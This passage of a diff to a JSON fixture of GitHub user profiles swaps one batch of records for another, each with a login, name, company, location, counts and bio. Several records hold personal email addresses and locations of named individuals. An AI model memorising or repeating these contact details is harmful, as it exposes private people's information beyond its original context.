"https://avatars.githubusercontent.com/u/43735306?v=4", + "company": "glueckkanja AG", + "location": "Hamburg, DE", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 1, - "created_at": "2021-04-08T12:02:36Z", - "updated_at": "2024-07-24T08:00:57Z", - "node_id": "MDQ6VXNlcjgyMTU1NzE2", + "following_count": 18, + "followers_count": 6, + "public_gists_count": 2, + "public_repositories_count": 43, + "created_at": "2018-10-01T02:04:26Z", + "updated_at": "2024-09-19T14:18:41Z", + "node_id": "MDQ6VXNlcjQzNzM1MzA2", "bio": "", "is_hireable": false, "twitter_username": "" @@ -422003,74 +681302,74 @@ }, { "model": "github.user", - "pk": 2471, + "pk": 7816, "fields": { - "nest_created_at": "2024-09-12T01:27:29.373Z", - "nest_updated_at": "2024-09-12T01:27:29.373Z", - "name": "Jonas VDB", - "login": "Jonas-vdb", + "nest_created_at": "2024-09-22T09:36:56.606Z", + "nest_updated_at": "2024-09-22T19:35:58.607Z", + "name": "Sunat Praphanwong", + "login": "SunatP", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/10735898?v=4", - "company": "", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/31818562?v=4", + "company": "MFEC Public Company Limited", + "location": "Thailand, Bangkok", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, + "following_count": 69, + "followers_count": 35, "public_gists_count": 0, - "public_repositories_count": 1, - "created_at": "2015-01-28T04:35:41Z", - "updated_at": "2024-08-22T08:14:28Z", - "node_id": "MDQ6VXNlcjEwNzM1ODk4", - "bio": "", + "public_repositories_count": 99, + "created_at": "2017-09-10T10:04:02Z", + "updated_at": "2024-08-14T09:57:53Z", + "node_id": "MDQ6VXNlcjMxODE4NTYy", + "bio": "Hi, I Am Sunat. I code and obfuscate.", "is_hireable": false, - "twitter_username": "" + "twitter_username": "Sunat_P" } }, { "model": "github.user", - "pk": 2472, + "pk": 7817, "fields": { - "nest_created_at": "2024-09-12T01:27:32.451Z", - "nest_updated_at": "2024-09-12T01:27:32.451Z", - "name": "", - "login": "chinmaybhave05", + "nest_created_at": "2024-09-22T09:36:57.239Z", + "nest_updated_at": "2024-09-22T19:35:59.245Z", + "name": "Raouf HADDADA", + "login": "raouf-haddada", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/71174866?v=4", - "company": "", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/22875897?v=4", + "company": "Prologue SOLUTIONS", + "location": "Sousse, Tunisia", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, + "following_count": 5, + "followers_count": 2, "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2020-09-12T10:34:22Z", - "updated_at": "2022-04-18T07:04:48Z", - "node_id": "MDQ6VXNlcjcxMTc0ODY2", - "bio": "", + "public_repositories_count": 12, + "created_at": "2016-10-16T23:39:49Z", + "updated_at": "2024-09-14T12:34:09Z", + "node_id": "MDQ6VXNlcjIyODc1ODk3", + "bio": "Just an opensource lazy developper ;)", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2473, + "pk": 7818, "fields": { - "nest_created_at": "2024-09-12T01:27:39.187Z", - "nest_updated_at": "2024-09-12T01:27:39.187Z", - "name": "", - "login": "ajendrosch2", + "nest_created_at": "2024-09-22T09:36:57.560Z", + "nest_updated_at": "2024-09-22T19:35:59.587Z", + "name": "Carlos Ledesma", + "login": "Ravenons", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/104896295?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/6712518?v=4", "company": "", - "location": "", + "location": "Málaga, Spain", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, + "following_count": 12, + "followers_count": 18, "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2022-05-04T09:14:24Z", - "updated_at": "2022-08-03T13:46:47Z", - "node_id": "U_kgDOBkCXJw", + "public_repositories_count": 10, + "created_at": "2014-02-18T06:05:26Z", + "updated_at": "2023-11-28T21:13:56Z", + "node_id": "MDQ6VXNlcjY3MTI1MTg=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -422078,24 +681377,49 @@ }, { "model": "github.user", - "pk": 2474, + "pk": 7819, "fields": { - "nest_created_at": "2024-09-12T01:27:40.455Z", - "nest_updated_at": "2024-09-12T01:40:19.319Z", + "nest_created_at": "2024-09-22T09:36:58.190Z", + "nest_updated_at": "2024-09-22T19:36:00.205Z", + "name": "Ricardo Zandonai", + "login": "rzandonai", + "email": "squall@outlook.com", + "avatar_url": "https://avatars.githubusercontent.com/u/8540884?v=4", + "company": "@Satty", + "location": "São Francisco do sul - SC Brazil", + "collaborators_count": 0, + "following_count": 9, + "followers_count": 16, + "public_gists_count": 2, + "public_repositories_count": 40, + "created_at": "2014-08-25T02:16:07Z", + "updated_at": "2024-09-18T00:12:17Z", + "node_id": "MDQ6VXNlcjg1NDA4ODQ=", + "bio": "", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 7820, + "fields": { + "nest_created_at": "2024-09-22T09:36:58.967Z", + "nest_updated_at": "2024-09-22T19:36:01.019Z", "name": "", - "login": "elastic-pangolin", + "login": "abheeshtan", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/104518433?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/88075849?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 1, - "followers_count": 1, + "followers_count": 2, "public_gists_count": 0, "public_repositories_count": 7, - "created_at": "2022-04-27T16:13:14Z", - "updated_at": "2024-07-03T15:04:13Z", - "node_id": "U_kgDOBjrTIQ", + "created_at": "2021-07-28T06:04:34Z", + "updated_at": "2024-01-29T07:05:16Z", + "node_id": "MDQ6VXNlcjg4MDc1ODQ5", "bio": "", "is_hireable": false, "twitter_username": "" @@ -422103,49 +681427,49 @@ }, { "model": "github.user", - "pk": 2475, + "pk": 7821, "fields": { - "nest_created_at": "2024-09-12T01:27:43.378Z", - "nest_updated_at": "2024-09-12T01:27:43.378Z", - "name": "mb", - "login": "mrtnbm", + "nest_created_at": "2024-09-22T09:36:59.282Z", + "nest_updated_at": "2024-09-22T19:40:15.722Z", + "name": "Robert Kiss", + "login": "kepten", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/49289399?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/502646?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 61, - "created_at": "2019-04-04T19:23:15Z", - "updated_at": "2024-07-04T17:10:44Z", - "node_id": "MDQ6VXNlcjQ5Mjg5Mzk5", - "bio": "", - "is_hireable": false, + "followers_count": 8, + "public_gists_count": 1, + "public_repositories_count": 19, + "created_at": "2010-11-30T00:03:06Z", + "updated_at": "2024-09-02T15:28:28Z", + "node_id": "MDQ6VXNlcjUwMjY0Ng==", + "bio": "IT security guy", + "is_hireable": true, "twitter_username": "" } }, { "model": "github.user", - "pk": 2476, + "pk": 7822, "fields": { - "nest_created_at": "2024-09-12T01:27:46.326Z", - "nest_updated_at": "2024-09-12T01:32:43.122Z", - "name": "", - "login": "andresghelarducci", + "nest_created_at": "2024-09-22T09:36:59.607Z", + "nest_updated_at": "2024-09-22T19:36:01.690Z", + "name": "Romanas Sonkinas", + "login": "SStorm", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/44871257?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/4594061?v=4", "company": "", - "location": "", + "location": "London, UK", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 4, - "created_at": "2018-11-08T14:11:19Z", - "updated_at": "2024-07-11T08:43:17Z", - "node_id": "MDQ6VXNlcjQ0ODcxMjU3", + "following_count": 5, + "followers_count": 7, + "public_gists_count": 2, + "public_repositories_count": 20, + "created_at": "2013-06-02T17:01:27Z", + "updated_at": "2024-09-05T07:07:46Z", + "node_id": "MDQ6VXNlcjQ1OTQwNjE=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -422153,24 +681477,24 @@ }, { "model": "github.user", - "pk": 2477, + "pk": 7823, "fields": { - "nest_created_at": "2024-09-12T01:27:47.942Z", - "nest_updated_at": "2024-09-12T01:27:47.942Z", - "name": "", - "login": "k4n5ha0", + "nest_created_at": "2024-09-22T09:36:59.920Z", + "nest_updated_at": "2024-09-22T19:36:02.006Z", + "name": "Rozina", + "login": "missy-tester", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/22064977?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/60778572?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 6, - "followers_count": 36, + "following_count": 0, + "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 19, - "created_at": "2016-09-08T00:59:23Z", - "updated_at": "2023-05-29T00:43:11Z", - "node_id": "MDQ6VXNlcjIyMDY0OTc3", + "public_repositories_count": 2, + "created_at": "2020-02-07T10:47:53Z", + "updated_at": "2024-07-31T06:56:50Z", + "node_id": "MDQ6VXNlcjYwNzc4NTcy", "bio": "", "is_hireable": false, "twitter_username": "" @@ -422178,24 +681502,24 @@ }, { "model": "github.user", - "pk": 2478, + "pk": 7824, "fields": { - "nest_created_at": "2024-09-12T01:27:49.197Z", - "nest_updated_at": "2024-09-12T01:27:49.197Z", - "name": "Lukas Adoma", - "login": "lukas-adoma", + "nest_created_at": "2024-09-22T09:37:00.232Z", + "nest_updated_at": "2024-09-22T19:36:02.332Z", + "name": "", + "login": "Ruedaja", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/53977328?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/6638307?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 3, "followers_count": 2, "public_gists_count": 0, - "public_repositories_count": 8, - "created_at": "2019-08-10T16:33:39Z", - "updated_at": "2024-01-23T01:49:33Z", - "node_id": "MDQ6VXNlcjUzOTc3MzI4", + "public_repositories_count": 13, + "created_at": "2014-02-10T11:02:17Z", + "updated_at": "2024-03-20T15:28:06Z", + "node_id": "MDQ6VXNlcjY2MzgzMDc=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -422203,99 +681527,174 @@ }, { "model": "github.user", - "pk": 2479, + "pk": 7825, "fields": { - "nest_created_at": "2024-09-12T01:27:50.899Z", - "nest_updated_at": "2024-09-12T01:27:50.899Z", - "name": "Adrián Fuentes", - "login": "fuentecilla86", + "nest_created_at": "2024-09-22T09:37:00.566Z", + "nest_updated_at": "2024-09-22T19:36:02.644Z", + "name": "Sebastian Guarino", + "login": "sguarin", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/3702345?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/4202701?v=4", "company": "", - "location": "", + "location": "Spain", "collaborators_count": 0, "following_count": 0, - "followers_count": 0, + "followers_count": 2, "public_gists_count": 0, - "public_repositories_count": 6, - "created_at": "2013-02-26T07:40:47Z", - "updated_at": "2024-04-15T14:33:15Z", - "node_id": "MDQ6VXNlcjM3MDIzNDU=", + "public_repositories_count": 27, + "created_at": "2013-04-19T15:09:54Z", + "updated_at": "2024-01-21T15:41:56Z", + "node_id": "MDQ6VXNlcjQyMDI3MDE=", "bio": "", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 7826, + "fields": { + "nest_created_at": "2024-09-22T09:37:01.017Z", + "nest_updated_at": "2024-09-22T19:36:02.953Z", + "name": "Sebastian Brandt", + "login": "sebbrandt87", + "email": "sebbrandt@mailbox.org", + "avatar_url": "https://avatars.githubusercontent.com/u/793580?v=4", + "company": "@Tchibo", + "location": "Hamburg, Germany", + "collaborators_count": 0, + "following_count": 13, + "followers_count": 25, + "public_gists_count": 28, + "public_repositories_count": 92, + "created_at": "2011-05-17T14:43:20Z", + "updated_at": "2024-08-01T13:52:40Z", + "node_id": "MDQ6VXNlcjc5MzU4MA==", + "bio": "Senior Cloud Engineer - Lead Online Platform at Tchibo GmbH", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2480, + "pk": 7827, "fields": { - "nest_created_at": "2024-09-12T01:27:53.772Z", - "nest_updated_at": "2024-09-12T01:27:53.772Z", - "name": "Bruno Guimarães", - "login": "brunobastosg", - "email": "brunobastosg@gmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/320122?v=4", - "company": "SERPRO - Serviço Federal de Processamento de Dados", - "location": "Salvador, BA, Brazil", + "nest_created_at": "2024-09-22T09:37:01.336Z", + "nest_updated_at": "2024-09-22T19:37:37.605Z", + "name": "Russell", + "login": "russellballestrini", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/909098?v=4", + "company": "", + "location": "Remote", "collaborators_count": 0, - "following_count": 29, - "followers_count": 8, - "public_gists_count": 0, + "following_count": 59, + "followers_count": 74, + "public_gists_count": 5, "public_repositories_count": 39, - "created_at": "2010-07-01T14:18:19Z", - "updated_at": "2024-09-05T19:47:27Z", - "node_id": "MDQ6VXNlcjMyMDEyMg==", - "bio": "", + "created_at": "2011-07-12T00:58:17Z", + "updated_at": "2024-05-10T13:09:14Z", + "node_id": "MDQ6VXNlcjkwOTA5OA==", + "bio": "Python", + "is_hireable": false, + "twitter_username": "russellbal" + } +}, +{ + "model": "github.user", + "pk": 7828, + "fields": { + "nest_created_at": "2024-09-22T09:37:02.908Z", + "nest_updated_at": "2024-09-22T19:36:04.867Z", + "name": "Millaguie", + "login": "millaguie", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/10820281?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 20, + "followers_count": 19, + "public_gists_count": 6, + "public_repositories_count": 51, + "created_at": "2015-02-02T23:56:25Z", + "updated_at": "2024-08-20T00:02:35Z", + "node_id": "MDQ6VXNlcjEwODIwMjgx", + "bio": "SecDevOps lemur", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2481, + "pk": 7829, "fields": { - "nest_created_at": "2024-09-12T01:27:54.985Z", - "nest_updated_at": "2024-09-12T01:37:46.751Z", - "name": "Arnaud Mergey", - "login": "amergey", + "nest_created_at": "2024-09-22T09:37:03.224Z", + "nest_updated_at": "2024-09-22T19:36:05.193Z", + "name": "Mmadu Manasseh", + "login": "MeNsaaH", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/956840?v=4", - "company": "Semarchy", - "location": "France", + "avatar_url": "https://avatars.githubusercontent.com/u/24734308?v=4", + "company": "@bisohns", + "location": "$HOME", "collaborators_count": 0, - "following_count": 1, - "followers_count": 3, + "following_count": 49, + "followers_count": 136, "public_gists_count": 0, - "public_repositories_count": 42, - "created_at": "2011-08-03T15:32:17Z", - "updated_at": "2024-02-16T09:40:16Z", - "node_id": "MDQ6VXNlcjk1Njg0MA==", - "bio": "", + "public_repositories_count": 62, + "created_at": "2016-12-23T13:53:33Z", + "updated_at": "2024-09-16T12:16:38Z", + "node_id": "MDQ6VXNlcjI0NzM0MzA4", + "bio": "Changing the World one Bit at a time", "is_hireable": false, - "twitter_username": "" + "twitter_username": "iamMensaah" } }, { "model": "github.user", - "pk": 2482, + "pk": 7830, "fields": { - "nest_created_at": "2024-09-12T01:27:56.193Z", - "nest_updated_at": "2024-09-12T01:27:56.193Z", + "nest_created_at": "2024-09-22T09:37:03.561Z", + "nest_updated_at": "2024-09-22T19:36:05.509Z", + "name": "Muhammad Rivki", + "login": "mikqi", + "email": "muhammad.rivki@live.com", + "avatar_url": "https://avatars.githubusercontent.com/u/4416419?v=4", + "company": "", + "location": "Jakarta, Indonesia", + "collaborators_count": 0, + "following_count": 23, + "followers_count": 76, + "public_gists_count": 4, + "public_repositories_count": 90, + "created_at": "2013-05-13T11:17:19Z", + "updated_at": "2024-09-21T13:41:24Z", + "node_id": "MDQ6VXNlcjQ0MTY0MTk=", + "bio": "Frontend Engineer", + "is_hireable": true, + "twitter_username": "__mikqi" + } +}, +{ + "model": "github.user", + "pk": 7831, + "fields": { + "nest_created_at": "2024-09-22T09:37:04.216Z", + "nest_updated_at": "2024-09-22T19:36:06.147Z", "name": "", - "login": "ecaisse", + "login": "NShani", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/1854279?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/8300635?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 3, - "created_at": "2012-06-15T15:06:10Z", - "updated_at": "2024-02-06T22:46:31Z", - "node_id": "MDQ6VXNlcjE4NTQyNzk=", + "followers_count": 1, + "public_gists_count": 14, + "public_repositories_count": 36, + "created_at": "2014-07-29T15:12:47Z", + "updated_at": "2024-08-04T13:02:52Z", + "node_id": "MDQ6VXNlcjgzMDA2MzU=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -422303,74 +681702,74 @@ }, { "model": "github.user", - "pk": 2483, + "pk": 7832, "fields": { - "nest_created_at": "2024-09-12T01:28:01.235Z", - "nest_updated_at": "2024-09-12T01:28:01.235Z", - "name": "Yurryt Vermeire", - "login": "YurrytVermeire", + "nest_created_at": "2024-09-22T09:37:04.541Z", + "nest_updated_at": "2024-09-22T19:36:06.454Z", + "name": "Nana Insaidoo", + "login": "n-insaidoo", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/78538193?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/36595353?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 5, + "following_count": 4, "followers_count": 3, "public_gists_count": 0, - "public_repositories_count": 3, - "created_at": "2021-02-04T10:45:07Z", - "updated_at": "2024-09-01T12:20:44Z", - "node_id": "MDQ6VXNlcjc4NTM4MTkz", - "bio": "Network & Security graduate, \r\nStudent Master in Applied Informatics", + "public_repositories_count": 30, + "created_at": "2018-02-18T11:31:57Z", + "updated_at": "2024-09-18T11:44:20Z", + "node_id": "MDQ6VXNlcjM2NTk1MzUz", + "bio": "Software Developer @ Meterian", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2484, + "pk": 7833, "fields": { - "nest_created_at": "2024-09-12T01:28:08.964Z", - "nest_updated_at": "2024-09-12T01:28:08.964Z", - "name": "", - "login": "bret99", + "nest_created_at": "2024-09-22T09:37:05.158Z", + "nest_updated_at": "2024-09-22T19:36:07.092Z", + "name": "Nikita", + "login": "Zilborg", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/64787351?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/33390074?v=4", "company": "", - "location": "", + "location": "Moscow", "collaborators_count": 0, - "following_count": 0, - "followers_count": 14, + "following_count": 2, + "followers_count": 5, "public_gists_count": 0, - "public_repositories_count": 19, - "created_at": "2020-05-04T13:06:18Z", - "updated_at": "2024-09-06T08:25:49Z", - "node_id": "MDQ6VXNlcjY0Nzg3MzUx", - "bio": "", + "public_repositories_count": 28, + "created_at": "2017-11-05T09:19:16Z", + "updated_at": "2024-08-13T13:54:48Z", + "node_id": "MDQ6VXNlcjMzMzkwMDc0", + "bio": "🐼", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2485, + "pk": 7834, "fields": { - "nest_created_at": "2024-09-12T01:28:10.634Z", - "nest_updated_at": "2024-09-12T01:28:10.634Z", - "name": "", - "login": "bahrb", + "nest_created_at": "2024-09-22T09:37:05.493Z", + "nest_updated_at": "2024-09-22T19:36:07.403Z", + "name": "Okunev Sergey", + "login": "Safren-tutu", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/40354362?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/54797656?v=4", "company": "", - "location": "Germany", + "location": "", "collaborators_count": 0, "following_count": 0, "followers_count": 0, "public_gists_count": 0, "public_repositories_count": 1, - "created_at": "2018-06-18T09:15:20Z", - "updated_at": "2022-03-03T10:52:23Z", - "node_id": "MDQ6VXNlcjQwMzU0MzYy", + "created_at": "2019-09-02T08:48:51Z", + "updated_at": "2024-08-29T17:56:35Z", + "node_id": "MDQ6VXNlcjU0Nzk3NjU2", "bio": "", "is_hireable": false, "twitter_username": "" @@ -422378,99 +681777,99 @@ }, { "model": "github.user", - "pk": 2486, + "pk": 7835, "fields": { - "nest_created_at": "2024-09-12T01:28:11.906Z", - "nest_updated_at": "2024-09-12T01:28:11.906Z", - "name": "Borja Domínguez", - "login": "bdovaz", + "nest_created_at": "2024-09-22T09:37:06.124Z", + "nest_updated_at": "2024-09-22T19:36:08.066Z", + "name": "Olaniyi Odeleye", + "login": "OlaniyiOdeleye", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/950602?v=4", - "company": "Virtualware", - "location": "Bilbao", + "avatar_url": "https://avatars.githubusercontent.com/u/77903157?v=4", + "company": "DigitalOcean", + "location": "Lagos, Nigeria", "collaborators_count": 0, - "following_count": 1, - "followers_count": 10, + "following_count": 0, + "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 40, - "created_at": "2011-07-31T23:30:32Z", - "updated_at": "2024-08-01T06:43:14Z", - "node_id": "MDQ6VXNlcjk1MDYwMg==", - "bio": "Senior Unity Developer", + "public_repositories_count": 5, + "created_at": "2021-01-23T22:51:34Z", + "updated_at": "2024-08-28T05:47:28Z", + "node_id": "MDQ6VXNlcjc3OTAzMTU3", + "bio": "", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2487, + "pk": 7836, "fields": { - "nest_created_at": "2024-09-12T01:28:13.170Z", - "nest_updated_at": "2024-09-12T01:28:13.170Z", - "name": "Cyril Labbe", - "login": "ryden54", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/4123392?v=4", - "company": "@boursorama", - "location": "Nancy", + "nest_created_at": "2024-09-22T09:37:06.771Z", + "nest_updated_at": "2024-09-22T19:36:08.700Z", + "name": "Osama Mahmood", + "login": "OsamaMahmood", + "email": "osama.mahmood40@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/12585224?v=4", + "company": "", + "location": "Islamabad, Pakistan", "collaborators_count": 0, - "following_count": 1, - "followers_count": 5, - "public_gists_count": 0, - "public_repositories_count": 8, - "created_at": "2013-04-11T07:04:00Z", - "updated_at": "2024-08-15T11:22:47Z", - "node_id": "MDQ6VXNlcjQxMjMzOTI=", - "bio": "", + "following_count": 13, + "followers_count": 37, + "public_gists_count": 7, + "public_repositories_count": 23, + "created_at": "2015-05-24T14:42:46Z", + "updated_at": "2024-07-17T12:00:36Z", + "node_id": "MDQ6VXNlcjEyNTg1MjI0", + "bio": "I am an Application Security Engineer and I had done bug bounty for 4 years. I have been acknowledged by Facebook, Yahoo, AOL, and many others.", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2488, + "pk": 7837, "fields": { - "nest_created_at": "2024-09-12T01:28:17.470Z", - "nest_updated_at": "2024-09-12T01:28:17.470Z", - "name": "Kai Kretschmann", - "login": "kkretsch", - "email": "kai@kaikretschmann.de", - "avatar_url": "https://avatars.githubusercontent.com/u/1115638?v=4", + "nest_created_at": "2024-09-22T09:37:07.083Z", + "nest_updated_at": "2024-09-22T19:36:09.013Z", + "name": "Pablo Santiago", + "login": "pablosnt", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/69458381?v=4", "company": "", - "location": "Germany", + "location": "", "collaborators_count": 0, - "following_count": 4, - "followers_count": 3, + "following_count": 2, + "followers_count": 46, "public_gists_count": 0, - "public_repositories_count": 10, - "created_at": "2011-10-10T07:28:18Z", - "updated_at": "2024-07-21T08:43:39Z", - "node_id": "MDQ6VXNlcjExMTU2Mzg=", - "bio": "Nerdy by nature", + "public_repositories_count": 2, + "created_at": "2020-08-10T09:40:34Z", + "updated_at": "2024-09-22T06:19:55Z", + "node_id": "MDQ6VXNlcjY5NDU4Mzgx", + "bio": "Application Security Engineer", "is_hireable": false, - "twitter_username": "kkretsch" + "twitter_username": "rekonosec" } }, { "model": "github.user", - "pk": 2489, + "pk": 7838, "fields": { - "nest_created_at": "2024-09-12T01:28:20.413Z", - "nest_updated_at": "2024-09-12T01:28:20.413Z", - "name": "Sascha Di Bernardo", - "login": "sdibernardo", + "nest_created_at": "2024-09-22T09:37:07.398Z", + "nest_updated_at": "2024-09-22T19:36:09.326Z", + "name": "Pablo Sánchez", + "login": "psbelin", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/23256170?v=4", - "company": "@viadee ", - "location": "Münster", + "avatar_url": "https://avatars.githubusercontent.com/u/3503207?v=4", + "company": "", + "location": "", "collaborators_count": 0, - "following_count": 10, - "followers_count": 4, + "following_count": 7, + "followers_count": 2, "public_gists_count": 0, - "public_repositories_count": 3, - "created_at": "2016-11-04T08:43:36Z", - "updated_at": "2024-09-06T08:16:09Z", - "node_id": "MDQ6VXNlcjIzMjU2MTcw", + "public_repositories_count": 4, + "created_at": "2013-02-07T16:24:15Z", + "updated_at": "2024-08-03T23:57:03Z", + "node_id": "MDQ6VXNlcjM1MDMyMDc=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -422478,24 +681877,49 @@ }, { "model": "github.user", - "pk": 2490, + "pk": 7839, "fields": { - "nest_created_at": "2024-09-12T01:28:28.791Z", - "nest_updated_at": "2024-09-18T00:18:39.927Z", - "name": "Stephan Wolf", - "login": "stephan-wolf-ais", + "nest_created_at": "2024-09-22T09:37:07.703Z", + "nest_updated_at": "2024-09-22T19:36:09.727Z", + "name": "Pascal Wichmann", + "login": "wichmannpas", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/51930074?v=4", - "company": "Kontron AIS GmbH", - "location": "Dresden, Germany", + "avatar_url": "https://avatars.githubusercontent.com/u/6310792?v=4", + "company": "", + "location": "Hamburg, Germany", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, + "following_count": 6, + "followers_count": 26, "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2019-06-17T20:08:04Z", - "updated_at": "2024-09-17T09:49:04Z", - "node_id": "MDQ6VXNlcjUxOTMwMDc0", + "public_repositories_count": 49, + "created_at": "2014-01-03T12:02:43Z", + "updated_at": "2024-09-02T11:25:26Z", + "node_id": "MDQ6VXNlcjYzMTA3OTI=", + "bio": "", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 7840, + "fields": { + "nest_created_at": "2024-09-22T09:37:08.348Z", + "nest_updated_at": "2024-09-22T19:36:10.367Z", + "name": "Peter Burkholder", + "login": "pburkholder", + "email": "peter.burkholder@gsa.gov", + "avatar_url": "https://avatars.githubusercontent.com/u/1211146?v=4", + "company": "US Government", + "location": "Hyattsville, MD", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 38, + "public_gists_count": 61, + "public_repositories_count": 113, + "created_at": "2011-11-21T19:30:14Z", + "updated_at": "2024-09-03T14:00:34Z", + "node_id": "MDQ6VXNlcjEyMTExNDY=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -422503,49 +681927,49 @@ }, { "model": "github.user", - "pk": 2491, + "pk": 7841, "fields": { - "nest_created_at": "2024-09-12T01:28:30.590Z", - "nest_updated_at": "2024-09-12T01:28:53.110Z", - "name": "", - "login": "matamorphosis", + "nest_created_at": "2024-09-22T09:37:08.667Z", + "nest_updated_at": "2024-09-22T19:36:10.680Z", + "name": "Phil Boyd", + "login": "P440Boyd", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/26025152?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/81324494?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 2, - "followers_count": 79, + "following_count": 0, + "followers_count": 1, "public_gists_count": 0, - "public_repositories_count": 8, - "created_at": "2017-02-25T13:32:17Z", - "updated_at": "2024-06-25T05:26:37Z", - "node_id": "MDQ6VXNlcjI2MDI1MTUy", + "public_repositories_count": 3, + "created_at": "2021-03-24T18:05:32Z", + "updated_at": "2024-07-24T17:21:25Z", + "node_id": "MDQ6VXNlcjgxMzI0NDk0", "bio": "", - "is_hireable": true, + "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2492, + "pk": 7842, "fields": { - "nest_created_at": "2024-09-12T01:28:31.919Z", - "nest_updated_at": "2024-09-12T01:28:31.919Z", + "nest_created_at": "2024-09-22T09:37:08.981Z", + "nest_updated_at": "2024-09-22T19:36:11.000Z", "name": "", - "login": "IchGehSteil", + "login": "adamtimmins", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/20698852?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/18688989?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 2, + "following_count": 0, "followers_count": 1, "public_gists_count": 0, "public_repositories_count": 0, - "created_at": "2016-07-28T08:12:48Z", - "updated_at": "2024-02-21T07:27:01Z", - "node_id": "MDQ6VXNlcjIwNjk4ODUy", + "created_at": "2016-04-26T22:08:53Z", + "updated_at": "2024-08-16T09:29:13Z", + "node_id": "MDQ6VXNlcjE4Njg4OTg5", "bio": "", "is_hireable": false, "twitter_username": "" @@ -422553,49 +681977,49 @@ }, { "model": "github.user", - "pk": 2493, + "pk": 7843, "fields": { - "nest_created_at": "2024-09-12T01:28:36.533Z", - "nest_updated_at": "2024-09-12T01:31:58.705Z", - "name": "Joynext Cybersecurity Incident Response Team", - "login": "JN-CSIRT", + "nest_created_at": "2024-09-22T09:37:09.313Z", + "nest_updated_at": "2024-09-22T19:36:11.326Z", + "name": "Adan Álvarez", + "login": "adanalvarez", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/109734641?v=4", - "company": "Joynext", - "location": "Dresden, Germany", + "avatar_url": "https://avatars.githubusercontent.com/u/6905200?v=4", + "company": "", + "location": "Barcelona", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, + "following_count": 6, + "followers_count": 47, "public_gists_count": 0, - 